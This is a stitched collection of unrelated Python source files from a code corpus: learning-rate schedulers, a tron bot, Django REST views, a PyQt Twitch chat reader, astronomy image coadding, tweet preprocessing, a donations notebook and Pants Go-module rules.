"will result in PyTorch skipping the first value of the learning rate schedule."
"See more details at "
"https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
self._step_count += 1
if epoch is None:
epoch = self.last_epoch + 1
self.last_epoch = epoch
for param_group, lr in zip(self.optimizer.param_groups, self.get_lr(self._step_count)):
param_group['lr'] = lr
def get_warmup_factor_at_iter(self, iter):
"""
Return the learning rate warmup factor at a specific iteration.
See :paper:`in1k1h` for more details.
Args:
method (str): warmup method; either "constant" or "linear".
iter (int): iteration at which to calculate the warmup factor.
warmup_iters (int): the number of warmup iterations.
Returns:
float: the effective warmup factor at the given iteration.
"""
if iter >= self.warmup_iters:
return 1.0
if self.warmup_method == "constant":
return self.warmup_factor
elif self.warmup_method == "linear":
return (iter + 1) / self.warmup_iters
elif self.warmup_method == "exponent":
return 1.0 - math.exp(-(iter + 1) / self.warmup_iters)
else:
return 1.0
class WarmupStepLR(_WarmupLRScheduler):
"""Sets the learning rate of each parameter group to the initial lr
decayed by gamma every step_size epochs. When last_epoch=-1, sets
initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
step_size (int): Period of learning rate decay.
gamma (float): Multiplicative factor of learning rate decay.
Default: 0.1.
last_epoch (int): The index of last epoch. Default: -1.
Example:
>>> # Assuming optimizer uses lr = 0.05 for all groups
>>> # lr = 0.05 if epoch < 30
>>> # lr = 0.005 if 30 <= epoch < 60
>>> # lr = 0.0005 if 60 <= epoch < 90
>>> # ...
>>> scheduler = StepLR(optimizer, step_size=30, gamma=0.1)
>>> for epoch in range(100):
>>> train(...)
>>> validate(...)
>>> scheduler.step()
"""
@AssemblyParams
def __init__(self, optimizer, step_size, gamma=0.1, last_epoch=-1, name=None,iters=None,factor=None):
self.step_size = step_size
self.gamma = gamma
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** (self.last_epoch // self.step_size)
for base_lr in self.base_lrs]
class WarmupMultiStepLR(_WarmupLRScheduler):
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones. When
last_epoch=-1, sets initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
milestones (list): List of epoch indices. Must be increasing.
gamma (float): Multiplicative factor of learning rate decay.
Default: 0.1.
last_epoch (int): The index of last epoch. Default: -1.
Example:
>>> # Assuming optimizer uses lr = 0.05 for all groups
>>> # lr = 0.05 if epoch < 30
>>> # lr = 0.005 if 30 <= epoch < 80
>>> # lr = 0.0005 if epoch >= 80
>>> scheduler = MultiStepLR(optimizer, milestones=[30,80], gamma=0.1)
>>> for epoch in range(100):
>>> train(...)
>>> validate(...)
>>> scheduler.step()
"""
@AssemblyParams
def __init__(self, optimizer, milestones, gamma=0.1, last_epoch=-1, name=None,iters=None,factor=None):
if not list(milestones) == sorted(milestones):
raise ValueError('Milestones should be a list of'
' increasing integers. Got {}', milestones)
self.milestones = milestones
self.gamma = gamma
super(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** bisect_right(self.milestones, self.last_epoch)
for base_lr in self.base_lrs]
class WarmupExponentialLR(_WarmupLRScheduler):
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma every epoch. When last_epoch=-1, sets initial lr as lr.
Args:
optimizer (Optimizer): Wrapped optimizer.
gamma (float): Multiplicative factor of learning rate decay.
last_epoch (int): The index of last epoch. Default: -1.
"""
@AssemblyParams
def __init__(self, optimizer, gamma, last_epoch=-1, name=None,iters=None,factor=None):
self.gamma = gamma
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [warmup_factor * base_lr for base_lr in self.base_lrs]
return [base_lr * self.gamma ** self.last_epoch
for base_lr in self.base_lrs]
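# Illustrative usage: because of the @AssemblyParams decorator, the schedulers above
# expect the warmup settings as the keyword arguments `name`, `iters` and `factor`.
# `optimizer`, `num_epochs` and `train_one_epoch` below are hypothetical placeholders.
#
#   scheduler = WarmupStepLR(optimizer, step_size=30, gamma=0.1,
#                            name="linear", iters=500, factor=0.1)
#   for epoch in range(num_epochs):
#       train_one_epoch(...)
#       scheduler.step()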
class WarmupCosineAnnealingLR(_WarmupLRScheduler):
r"""Set the learning rate of each parameter group using a cosine annealing
schedule, where :math:`\eta_{max}` is set to the initial lr and
:math:`T_{cur}` is the number of epochs since the last restart in SGDR:
.. math::
\eta_t = \eta_{min} + \frac{1}{2}(\eta_{max} - \eta_{min})(1 +
\cos(\frac{T_{cur}}{T_{max}}\pi))
When last_epoch=-1, sets initial lr as lr.
It has been proposed in
`SGDR: Stochastic Gradient Descent with Warm Restarts`_. Note that this only
implements the cosine annealing part of SGDR, and not the restarts.
Args:
optimizer (Optimizer): Wrapped optimizer.
T_max (int): Maximum number of iterations.
eta_min (float): Minimum learning rate. Default: 0.
last_epoch (int): The index of last epoch. Default: -1.
.. _SGDR\: Stochastic Gradient Descent with Warm Restarts:
https://arxiv.org/abs/1608.03983
"""
@AssemblyParams
def __init__(self, optimizer,T_max, eta_min=0, last_epoch=-1, name=None,iters=None,factor=None):
self.T_max = T_max
self.eta_min = eta_min
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def get_lr(self, iter):
warmup_factor = self.get_warmup_factor_at_iter(iter)
if iter <= self.warmup_iters:
return [self.eta_min + warmup_factor*(base_lr - self.eta_min) for base_lr in self.base_lrs]
return [self.eta_min + (base_lr - self.eta_min) *
(1 + math.cos(math.pi * self.last_epoch / self.T_max)) / 2
for base_lr in self.base_lrs] | StarcoderdataPython |
1625112 | <reponame>ozemsbg/Mitty
__version__ = '2.28.3' | StarcoderdataPython |
3243706 | from .home import *
| StarcoderdataPython |
3360371 | <reponame>metakirby5/tron-ai<gh_stars>0
#!/usr/bin/python
"""Template for your tron bot"""
import tron
import random
def which_move(board):
return tron.NORTH
# you do not need to modify this part
for board in tron.Board.generate():
tron.move(which_move(board))
| StarcoderdataPython |
1690077 | <filename>caluma/workflow/tests/test_visibilities.py
import pytest
from ...form import models as form_models
from ...form.schema import Answer, Document
from .. import models
from ..schema import Case, WorkItem
from ..visibilities import AddressedGroups
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_work_item_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(
WorkItem, models.WorkItem.objects, admin_info
)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_case_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(Case, models.Case.objects, admin_info)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_document_visibility(db, admin_info, size, work_item):
queryset = AddressedGroups().filter_queryset(
Document, form_models.Document.objects, admin_info
)
assert queryset.count() == size
@pytest.mark.parametrize(
"work_item__addressed_groups,size", [(["unknown"], 0), (["admin", "other"], 1)]
)
def test_assigned_groups_answer_visibility(db, admin_info, size, work_item, answer):
queryset = AddressedGroups().filter_queryset(
Answer, form_models.Answer.objects, admin_info
)
assert queryset.count() == size
| StarcoderdataPython |
160312 | import sys
import os
from pathlib import Path
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtWidgets import QApplication, QWidget, QToolTip, QPushButton, QGridLayout, QLineEdit, QLabel
from PyQt5.QtGui import QFont
from utils import get_chat, get_chat_contents, text_to_speech
os.chdir(sys.path[0]) # Change Current Directory to the location of gui.py
class GetChatThread(QThread):
"""Subclass of `QThread` that is used to call the `get_chat` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `get_chat` function in a new thread
"""
self.signal.emit(get_chat(self.channel_name))
class GetChatContentsThread(QThread):
"""Subclass of `QThread` that is used to call the `get_chat_contents` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, path, from_):
"""Constructor
Args:
path (str): Name of the current channel
from_ (str): Name of the button that invoked this function
"""
self.path = path
self.from_ = from_
super().__init__()
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `get_chat_contents` function in a new thread
"""
self.signal.emit(get_chat_contents(self.path, self.from_))
class TTSThread(QThread):
"""Subclass of `QThread` that is used to call the `text_to_speech` function
Attributes:
signal (PyQT5.QtCore.pyqtSignal): Signal that is used to communicate between objects
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, data):
"""Constructor
Args:
data (str): Chat message that is to be converted to speech
"""
self.data = data
super().__init__()
def run(self):
"""Method is invoked when the thread is started
This in turn starts the `text_to_speech` function in a new thread
"""
self.signal.emit(text_to_speech(self.data))
class HomeScreen(QWidget):
"""The Main GUI Window for the application, inherited from `QWidget`
Attributes:
channel_name_text_field (QLineEdit): Text Field for Channel Name
chat_content_label (QLabel): Label for Channel Name Text Field
get_chat_contents_thread (QThread): Thread object used to call `get_chat_contents`
get_chat_thread (QThread): Thread object used to call `get_chat`
grid (QGridLayout): Grid Layout for the entire GUI
mention_button (QPushButton): Button that reads any chats that has mentioned the name of the channel (`eg: @channel_name`)
read_last_button (QPushButton): Button that reads the last chat message from the IRC stream
read_random_button (QPushButton): Button that reads any random message from the IRC stream
start_chat_button (QPushButton): Starts a thread that establishes a socket connection and logs the chats
tts_thread (QThread): Thread object used to call `text_to_speech`
"""
def __init__(self):
"""Setup the GUI Widgets and Button"""
super().__init__()
Path('logs').mkdir(exist_ok=True)
QToolTip.setFont(QFont('SansSerif', 10))
self.setGeometry(300, 300, 300, 220)
self.setWindowTitle('TwitchReader')
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.setLayout(self.grid)
self.channel_name_text_field = QLineEdit(self)
self.channel_name_text_field.setPlaceholderText('Channel Name')
self.grid.addWidget(self.channel_name_text_field, 0, 0)
self.channel_name_text_field.textEdited.connect(self.validate)
self.start_chat_button = QPushButton('Start', self)
self.grid.addWidget(self.start_chat_button, 0, 1)
self.start_chat_button.setEnabled(False)
self.start_chat_button.clicked.connect(self.start_chat)
self.get_chat_thread = GetChatThread()
self.chat_content_label = QLabel(self)
self.chat_content_label.setWordWrap(True)
self.grid.addWidget(self.chat_content_label, 1, 0, 1, 2)
self.read_random_button = QPushButton('Read Random', self)
self.grid.addWidget(self.read_random_button, 2, 0)
self.read_random_button.setEnabled(False)
self.read_random_button.clicked.connect(self.start_text_to_speech)
self.read_last_button = QPushButton('Read Last', self)
self.grid.addWidget(self.read_last_button, 2, 1)
self.read_last_button.setEnabled(False)
self.read_last_button.clicked.connect(self.start_text_to_speech)
self.mention_button = QPushButton('@ me', self)
self.grid.addWidget(self.mention_button, 3, 0, 1, 2)
self.mention_button.setEnabled(False)
self.mention_button.clicked.connect(self.start_text_to_speech)
self.show()
def validate(self):
"""Helper method to enable the "Start" (`start_chat_button`) button"""
self.start_chat_button.setEnabled(bool(self.channel_name_text_field.text().strip()))
def start_chat(self):
"""Helper method that calls the actual method that connects to the IRC stream using a socket
Disables the "Start" button after it is started
Enables the "Read Random", "Read Last" and "@ me" button after it is started
This prevents the user from trying to start more than one thread for logging in the same GUI
Start the GUI app as a different process to enable logging across multiple channels
"""
self.start_chat_button.setEnabled(False)
self.channel_name_text_field.setDisabled(True)
toggle = (self.read_random_button, self.read_last_button, self.mention_button)
for button in toggle:
getattr(button, 'setEnabled')(True)
self.get_chat_thread.channel_name = self.channel_name_text_field.text().strip()
self.get_chat_thread.start()
def start_text_to_speech(self):
"""Helper method that retrieves the chat message that is to be converted to speech"""
self.toggle_button('stub', False)
self.get_chat_contents_thread = GetChatContentsThread(self.get_chat_thread.channel_name, self.sender().text())
self.get_chat_contents_thread.signal.connect(self.stop_text_to_speech)
self.get_chat_contents_thread.start()
def stop_text_to_speech(self, chat):
"""Helper method that converts the chat message to speech
Calls the `text_to_speech` method in a thread
Args:
chat (dict): Dictionary of the chat message that is to be converted to speech
"""
state, chat_to_read = chat
if not state:
self.chat_content_label.setText(chat_to_read)
self.toggle_button(
'stub') # is it better to just enable the buttons here instead of passing a stub signal to a method?
else:
data = f"{chat_to_read['username']} says {chat_to_read['comment']}"
self.chat_content_label.setText(data)
self.tts_thread = TTSThread(data)
self.tts_thread.signal.connect(self.toggle_button)
self.tts_thread.start()
def toggle_button(self, signal, state=True):
"""Used to toggle the state of buttons
Args:
signal (str): stub argument, no actual use
state (bool, optional): State to toggle the buttonsm `True` = enable, `False` = disable
"""
self.read_random_button.setEnabled(state)
self.read_last_button.setEnabled(state)
self.mention_button.setEnabled(state)
app = QApplication(sys.argv)
ex = HomeScreen()
app.exec_()
| StarcoderdataPython |
3250374 | # -*- coding: utf-8 -*-
from .focal_loss import *
from .iou_loss import *
from .cross_entropy_loss import *
from .bce_with_logits_loss import *
from .gfocal_loss import *
from .mse_loss import *
from .smooth_l1_loss import *
| StarcoderdataPython |
103263 | <gh_stars>0
import argparse
from pRestore.stuff import Stuff
from pRestore.backup import Backup
from pRestore.restore import Restore
Stuff.print_logo()
description = 'pRestore is a software used to make backup of file permissions and restore them in case of disaster'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('target', metavar='D', type=str, nargs=1, help='Target directory/Restore file')
parser.add_argument('--backup', dest='backup', action='store_const', const=True, default=False,
help='Make a backup of the target directory')
parser.add_argument('--restore', dest='restore', action='store_const', const=True, default=False,
help='Restore permissions from the target backup file')
parser.add_argument('--out', help='Output directory where to store the backup', default='.')
parser.add_argument('--threads', default=10,
help='The maximum number of threads that will be used for making the backup or restoring permissions')
parser.add_argument('--verbose', dest='verbose', action='store_const', default=False, const=True,
help='Display more detailed information about what the script is doing')
arguments = parser.parse_args()
target = arguments.target[0]
backup = arguments.backup
restore = arguments.restore
out = arguments.out
threads = arguments.threads
verbose = arguments.verbose
if restore:
Restore(target, threads, verbose)
else:
Backup(target, out, threads, verbose)
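# Illustrative invocations (the script name `prestore.py` and the backup file name
# are assumptions; the backup file is whatever the Backup step wrote to --out):
#
#   python prestore.py /etc --backup --out /tmp/perm_backups --threads 20
#   python prestore.py /tmp/perm_backups/<backup-file> --restore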
| StarcoderdataPython |
128641 | import numpy as np
from .lanczos import lanczos_resample_three, lanczos_resample_one
def invert_affine_transform_wcs(u, v, wcs):
"""Invert a galsim.AffineTransform WCS.
The AffineTransform WCS forward model is
[u, v] = Jac * ([x, y] - origin) + world_origin
where the `*` is a matrix multiplication and `[u, v]` is a column
vector, etc.
Parameters
----------
u : np.ndarray
The first world coordinate value.
v : np.ndarray
The second world coordinate value.
wcs : galsim.AffineTransform
The AffineTransform WCS object to invert.
Returns
-------
x : np.ndarray
The first image coordinate value.
y : np.ndarray
The second image coordinate value.
"""
invmat = np.linalg.inv(
np.array([[wcs.dudx, wcs.dudy], [wcs.dvdx, wcs.dvdy]]))
du = u - wcs.u0
dv = v - wcs.v0
x = invmat[0, 0] * du + invmat[0, 1] * dv + wcs.x0
y = invmat[1, 0] * du + invmat[1, 1] * dv + wcs.y0
return x, y
def coadd_image_noise_interpfrac(
se_images, se_noises, se_interp_fracs, se_wcs_objs,
coadd_wgts, coadd_scale, coadd_dim):
"""Coadd a set of SE images, noise fields, and interpolation fractions.
Parameters
----------
se_images : list of np.ndarray
The list of SE images to coadd.
se_noises : list of np.ndarray
The list of SE noise images to coadd.
se_interp_fracs : list of np.ndarray
The list of SE interpolated fraction images to coadd.
se_wcs_objs : list of galsim.BaseWCS or children
The WCS objects for each of the SE images.
coadd_wgts : 1d array-like object of floats
The relative coaddng weights for each of the SE images.
coadd_scale : float
The pixel scale of desired coadded image.
coadd_dim : int
The number of pixels desired for the final coadd image..
Returns
-------
img : np.ndarray, shape (coadd_dim, coadd_dim)
The coadd image.
nse : np.ndarray, shape (coadd_dim, coadd_dim)
The coadd noise image.
intp : np.ndarray, shape (coadd_dim, coadd_dim)
The interpolated flux fraction in each coadd pixel.
"""
# coadd pixel coords
y, x = np.mgrid[0:coadd_dim, 0:coadd_dim]
u = x.ravel() * coadd_scale
v = y.ravel() * coadd_scale
coadd_image = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
coadd_noise = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
coadd_intp = np.zeros((coadd_dim, coadd_dim), dtype=np.float32)
wgts = coadd_wgts / np.sum(coadd_wgts)
for se_im, se_nse, se_intp, se_wcs, wgt in zip(
se_images, se_noises, se_interp_fracs, se_wcs_objs, wgts):
se_x, se_y = invert_affine_transform_wcs(u, v, se_wcs)
im, nse, intp, _ = lanczos_resample_three(
se_im / se_wcs.pixelArea(),
se_nse / se_wcs.pixelArea(),
se_intp,
se_y,
se_x)
coadd_image += (im.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_noise += (nse.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_intp += (intp.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_image *= (coadd_scale**2)
coadd_noise *= (coadd_scale**2)
return coadd_image, coadd_noise, coadd_intp
def coadd_psfs(
se_psfs, se_wcs_objs, coadd_wgts,
coadd_scale, coadd_dim, coadd_offset, se_offsets):
"""Coadd the PSFs.
Parameters
----------
se_psfs : list of np.ndarray
The list of SE PSF images to coadd.
se_wcs_objs : list of galsim.BaseWCS or children
The WCS objects for each of the SE PSFs.
coadd_wgts : 1d array-like object of floats
The relative coaddng weights for each of the SE PSFs.
coadd_scale : float
The pixel scale of desired coadded PSF image.
coadd_dim : int
The number of pixels desired for the final coadd PSF.
coadd_offset : float
The offset in pixels of the start of the coadd PSF image stamp.
se_offsets : list of tuples of floats
The offset in the SE image coords of the start of the SE PSF
image.
Returns
-------
psf : np.ndarray
The coadded PSF image.
"""
# coadd pixel coords
y, x = np.mgrid[0:coadd_dim, 0:coadd_dim]
u = (coadd_offset + x.ravel()) * coadd_scale
v = (coadd_offset + y.ravel()) * coadd_scale
coadd_image = np.zeros((coadd_dim, coadd_dim), dtype=np.float64)
wgts = coadd_wgts / np.sum(coadd_wgts)
for se_psf, se_wcs, wgt, se_offset in zip(
se_psfs, se_wcs_objs, wgts, se_offsets):
se_x, se_y = invert_affine_transform_wcs(u, v, se_wcs)
se_x -= se_offset[0]
se_y -= se_offset[1]
im, _ = lanczos_resample_one(se_psf / se_wcs.pixelArea(), se_y, se_x)
coadd_image += (im.reshape((coadd_dim, coadd_dim)) * wgt)
coadd_image *= (coadd_scale**2)
return coadd_image
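if __name__ == "__main__":
    # Round-trip sanity check for the affine-WCS inversion above.  A SimpleNamespace
    # stands in for a galsim.AffineTransform here, exposing only the attributes that
    # invert_affine_transform_wcs actually reads; the numbers are arbitrary.
    from types import SimpleNamespace
    mock_wcs = SimpleNamespace(dudx=0.2, dudy=0.01, dvdx=-0.01, dvdy=0.2,
                               u0=1.5, v0=-0.5, x0=100.0, y0=50.0)
    x = np.array([10.0, 200.0, 35.5])
    y = np.array([20.0, 150.0, 80.25])
    # forward model: [u, v] = Jac @ ([x, y] - origin) + world_origin
    u = mock_wcs.dudx * (x - mock_wcs.x0) + mock_wcs.dudy * (y - mock_wcs.y0) + mock_wcs.u0
    v = mock_wcs.dvdx * (x - mock_wcs.x0) + mock_wcs.dvdy * (y - mock_wcs.y0) + mock_wcs.v0
    x_back, y_back = invert_affine_transform_wcs(u, v, mock_wcs)
    assert np.allclose(x_back, x) and np.allclose(y_back, y)
    print("affine WCS round-trip OK")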
| StarcoderdataPython |
43535 | <filename>data/english_tweets/preprocess_tweets.py
import csv
import re
import string
def remove_chars(text):
# remove links
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
text = pattern.sub('', text)
# remove tags
text = re.sub(r'\w*@\w*', '', text)
# remove punctuations
text = text.translate(str.maketrans('', '', string.punctuation))
# remove newlines and strip text
text = text.replace("\n", "").strip()
return text
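# Example of the combined effect (traced by hand): links, @-mentions and punctuation
# are removed, then the ends are whitespace-stripped, e.g.
#   remove_chars("Love it! @VirginAmerica https://t.co/abc123")  ->  "Love it"
# Internal runs of spaces left behind by the removals are not collapsed.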
if __name__ == "__main__":
pos = 2363
neg = 2363
with open('Tweets.csv', mode='r') as csv_file:
with open('even_dataset.txt', "w") as train_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
line_count += 1
text = row["text"]
text = remove_chars(text)
if row["airline_sentiment"] == "positive" and pos > 0:
pos -= 1
train_file.write(f'__label__2 {text}' + "\n")
elif neg > 0:
neg -= 1
train_file.write(f'__label__1 {text}' + "\n")
line_count += 1
if neg == 0 and pos == 0:
break
print(f'Processed {line_count} lines.') | StarcoderdataPython |
3220182 | <filename>Contacts/migrations/0005_auto_20180303_0307.py<gh_stars>0
# Generated by Django 2.0.2 on 2018-03-03 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Contacts', '0004_auto_20180303_0304'),
]
operations = [
migrations.AlterField(
model_name='contact',
name='phone',
field=models.IntegerField(),
),
]
| StarcoderdataPython |
1755262 | <reponame>nabint/profiles-rest-api<filename>profiles_api/views.py
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.authentication import TokenAuthentication
from rest_framework import viewsets
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
"""Test API View"""
# this should be serializer_class not other name
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
            'Uses HTTP methods as functions (get, post, patch, put, delete)',
'Is similar to a traditional Django View',
'Gives us the most control over our applications',
'Is mapped manually to URLs',
]
return Response({'message': 'Hello!', 'an_apiview': an_apiview})
def post(self, request):
""""Creates a hello message with our name"""
serializerss = self.serializer_class(data=request.data)
if serializerss.is_valid():
name = serializerss.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializerss.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handles updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handles a partial update of object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Deletes an object"""
return Response({'method': 'DELETE'})
class HelloViewSets(viewsets.ViewSet):
serializer_class = serializers.HelloSerializer
"""Test API Viewsets"""
def list(self, request):
"""Return a hello message"""
a_viewsets = [
            'Uses actions (list, create, retrieve, update, partial_update)',
            'Automatically maps to URLs using Routers',
'Provides more functionality with less code'
]
return Response({'message': 'Hello!', 'a_viewsets': a_viewsets})
def create(self, request):
"""Create a new Hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handles Getting Object by its ID"""
return Response({'http_method': "GET"})
def update(self, request, pk=None):
"""Handles Updating an object"""
return Response({'HTTP_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handles updating a part of object"""
return Response({'http_method': 'Patch'})
def destroy(self, request, pk=None):
"""Handles destroying an object"""
return Response({"Http_method": "DELETE"})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiels"""
serializer_class = serializers.UserProfileSerializer
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email',)
queryset = models.UserProfile.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
# it doesn't enable itself in browseable api
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creaing,reading, and updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (
permissions.UpdateOwnStatus,
IsAuthenticated,
)
def perform_create(self, serializer):
"""Sets the user profile to logged in user"""
serializer.save(user_profile=self.request.user)
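# Illustrative wiring sketch: these viewsets are typically registered in a urls.py
# with a DRF router; the route prefixes below are placeholders, not the project's
# actual URL configuration.
#
#   from rest_framework.routers import DefaultRouter
#   router = DefaultRouter()
#   router.register('profile', UserProfileViewSet)
#   router.register('feed', UserProfileFeedViewSet)
#   urlpatterns = [path('', include(router.urls))]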
| StarcoderdataPython |
198771 | <filename>src/olympia/addons/migrations/0018_auto_20200803_1311.py
# Generated by Django 2.2.14 on 2020-08-03 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('addons', '0017_addonreviewerflags_notified_about_expiring_delayed_rejections'),
]
operations = [
migrations.AlterField(
model_name='addonreviewerflags',
name='notified_about_expiring_info_request',
field=models.NullBooleanField(default=None),
),
]
| StarcoderdataPython |
70808 | <reponame>pseudonym117/kernel-graphql<gh_stars>1-10
from . import riotapi
@riotapi.route('/')
def index():
return 'hello world!'
| StarcoderdataPython |
134822 | from flask import Flask, session
app = Flask(__name__)
app.secret_key = " "
| StarcoderdataPython |
3250006 |
# coding: utf-8
# # Setup Notebook
# In[2]:
# Standard library
import os
import sys
sys.path.append("../src/")
# Third party imports
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
# In[3]:
# Customizations
sns.set() # matplotlib defaults
# Any tweaks that normally go in .matplotlibrc, etc., should explicitly go here
plt.rcParams['figure.figsize'] = (12, 8)
get_ipython().magic("config InlineBackend.figure_format='retina'")
# In[4]:
# Find the notebook the saved figures came from
fig_prefix = "../figures/2017-01-14-tc-"
# ## Load Data
# In[7]:
datfile = '../../zzData_RAW/P00000001-ALL.csv'
cols = ['cand_nm', 'contbr_st', 'contbr_employer', 'contb_receipt_amt', 'contbr_occupation', 'contb_receipt_dt']
donate = pd.read_csv(datfile, index_col=False, dtype='object', usecols = cols)
donate['contb_receipt_amt'] = pd.to_numeric(donate['contb_receipt_amt'])
# donate['contb_receipt_dt'] = pd.to_datetime(donate['contb_receipt_dt'])
donate.dtypes
# ## Review Data
# In[8]:
import qgrid  # Best practice is to put imports at the top of the notebook.
qgrid.nbinstall(overwrite=True)
# In[9]:
donate.head()
# In[10]:
qgrid.show_grid(donate.head(), remote_js=True)
# In[11]:
donate.groupby('cand_nm').mean()
# In[56]:
sns.stripplot(x="cand_nm", y="contb_receipt_amt", data=donate[10000:20000]);
# In[ ]:
#x = np.random.normal(size=100)
sns.distplot(donate['contb_receipt_amt'], bins=20, kde=False, rug=True);
# In[ ]:
| StarcoderdataPython |
3282931 | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import logging
import os
from dataclasses import dataclass
from pants.backend.go.target_types import GoModSourcesField
from pants.backend.go.util_rules.sdk import GoSdkProcess
from pants.base.specs import AddressSpecs, AscendantAddresses
from pants.build_graph.address import Address
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.fs import Digest
from pants.engine.process import ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
HydratedSources,
HydrateSourcesRequest,
InvalidTargetException,
UnexpandedTargets,
WrappedTarget,
)
from pants.util.docutil import bin_name
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class OwningGoModRequest(EngineAwareParameter):
address: Address
def debug_hint(self) -> str:
return self.address.spec
@dataclass(frozen=True)
class OwningGoMod:
address: Address
@rule
async def find_nearest_go_mod(request: OwningGoModRequest) -> OwningGoMod:
# We don't expect `go_mod` targets to be generated, so we can use UnexpandedTargets.
candidate_targets = await Get(
UnexpandedTargets, AddressSpecs([AscendantAddresses(request.address.spec_path)])
)
# Sort by address.spec_path in descending order so the nearest go_mod target is sorted first.
go_mod_targets = sorted(
(tgt for tgt in candidate_targets if tgt.has_field(GoModSourcesField)),
key=lambda tgt: tgt.address.spec_path,
reverse=True,
)
if not go_mod_targets:
raise InvalidTargetException(
f"The target {request.address} does not have a `go_mod` target in its BUILD file or "
"any ancestor BUILD files. To fix, please make sure your project has a `go.mod` file "
f"and add a `go_mod` target (you can run `{bin_name()} tailor` to do this)."
)
nearest_go_mod_target = go_mod_targets[0]
return OwningGoMod(nearest_go_mod_target.address)
@dataclass(frozen=True)
class GoModInfo:
# Import path of the Go module, based on the `module` in `go.mod`.
import_path: str
digest: Digest
mod_path: str
minimum_go_version: str | None
@dataclass(frozen=True)
class GoModInfoRequest(EngineAwareParameter):
source: Address | GoModSourcesField
def debug_hint(self) -> str:
if isinstance(self.source, Address):
return self.source.spec
else:
return self.source.address.spec
@rule
async def determine_go_mod_info(
request: GoModInfoRequest,
) -> GoModInfo:
if isinstance(request.source, Address):
wrapped_target = await Get(WrappedTarget, Address, request.source)
sources_field = wrapped_target.target[GoModSourcesField]
else:
sources_field = request.source
go_mod_path = sources_field.go_mod_path
go_mod_dir = os.path.dirname(go_mod_path)
# Get the `go.mod` (and `go.sum`) and strip so the file has no directory prefix.
